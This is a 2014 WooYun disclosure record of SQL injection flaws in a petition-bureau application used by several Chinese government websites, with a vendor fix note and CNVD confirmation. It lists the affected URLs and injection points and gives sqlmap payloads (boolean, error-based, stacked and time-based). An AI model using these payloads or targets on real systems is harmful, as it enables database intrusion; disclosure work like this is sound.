当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059988

漏洞标题:多个政府在用的通用程序存在MSSQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-05-09 18:08

修复时间:2014-08-07 18:12

公开时间:2014-08-07 18:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-09: 细节已通知厂商并且等待厂商处理中
2014-05-12: 厂商已经确认,细节仅向厂商公开
2014-05-15: 细节向第三方安全合作伙伴开放
2014-07-06: 细节向核心白帽子及相关领域专家公开
2014-07-16: 细节向普通白帽子公开
2014-07-26: 细节向实习白帽子公开
2014-08-07: 细节向公众公开

简要描述:

RT

详细说明:

波及多个省市的信访局,MSSQL数据库。
技术支持单位:北京易博讯科技有限公司
存在问题的url:
http://221.231.143.3/
http://wsxf.ahxfj.gov.cn/
http://www.nmgxfj.gov.cn/
http://xzxx.fsxzf.gov.cn/
http://wsxf.my.gov.cn/
http://wsxf.lepingshi.gov.cn/
http://wsxf.zqxf.gov.cn/
http://www.dzxfj.gov.cn/
http://xinfang.nanning.gov.cn/
预警:
http://218.94.25.233:81/
http://wfsxfj.weifang.gov.cn/
http://www.lyxfj.gov.cn/
http://www.jkq.lyxfj.gov.cn/
http://oa.lzwebs.com/
http://125.64.4.176/
http://www.lcxfj.gov.cn/
http://xf.lwsxfj.cn/
http://www.hzsxfj.gov.cn/
注入点:
http://221.231.143.3/getpwd.asp?DepartNo=001000000000&UserName=
http://wsxf.ahxfj.gov.cn/email_index.asp?DepartNo=001000000
http://wsxf.ahxfj.gov.cn/include/exit.asp?DepartNo=001000000
http://wsxf.ahxfj.gov.cn/include/save_myd.asp?DepartNo=001000000
http://www.nmgxfj.gov.cn/qdshow.asp?Qid=1
http://xzxx.fsxzf.gov.cn/view_mail.aspx?regist_no=201403000006
http://wsxf.lepingshi.gov.cn/email_index.asp?DepartNo=001000000
http://wsxf.lepingshi.gov.cn/include/exit.asp?DepartNo=001000000
http://wsxf.zqxf.gov.cn/view_mail.aspx?regist_no=201303000067&zt=1
http://xinfang.nanning.gov.cn/getpwd.asp?DepartNo=001000000000&UserName=

漏洞证明:

http://221.231.143.3/getpwd.asp?DepartNo=001000000000&UserName=

Place: GET
Parameter: UserName
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: DepartNo=001000000000&UserName=' AND 7227=7227 AND 'plFE'='plFE
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: DepartNo=001000000000&UserName=' AND 1176=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1176=1176) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(115)+CHAR(98)+CHAR(109)+CHAR(113))) AND 'DdQq'='DdQq
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: DepartNo=001000000000&UserName='; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: DepartNo=001000000000&UserName=' AND 9123=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'bSIU'='bSIU
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005


http://wsxf.ahxfj.gov.cn/email_index.asp?DepartNo=001000000

Place: GET
Parameter: DepartNo
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: DepartNo=001000000' AND 1254=CONVERT(INT,(SELECT CHAR(113)+CHAR(105)+CHAR(99)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (1254=1254) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(108)+CHAR(119)+CHAR(113))) AND 'KJyR'='KJyR
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: DepartNo=001000000'; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000


http://xzxx.fsxzf.gov.cn/view_mail.aspx?regist_no=201403000006

Place: GET
Parameter: regist_no
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: regist_no=201403000006' AND 3793=3793 AND 'rgBv'='rgBv
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: regist_no=201403000006'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: regist_no=201403000006' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user is DBA: True

修复方案:

数字型参数DepartNo,regist_no
修复方案为:在接收参数regist_no,DepartNo时,对其进行强制整型转换即可。
以id参数为例,
int id= Integer.parseInt("id") ;//对id整型转换后再进行下一步的数据库查询更安全
字符型参数UserName
修复方案为:在接收参数value时,对其进行白名单限制。
例如,我先定UserName值只为我们设定的数组中的几个值

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-05-12 18:37

厂商回复:

CNVD确认并复现所述情况,由CNVD通过公开联系渠道联系软件生产厂商北京易博讯科技有限公司处置。

最新状态:

暂无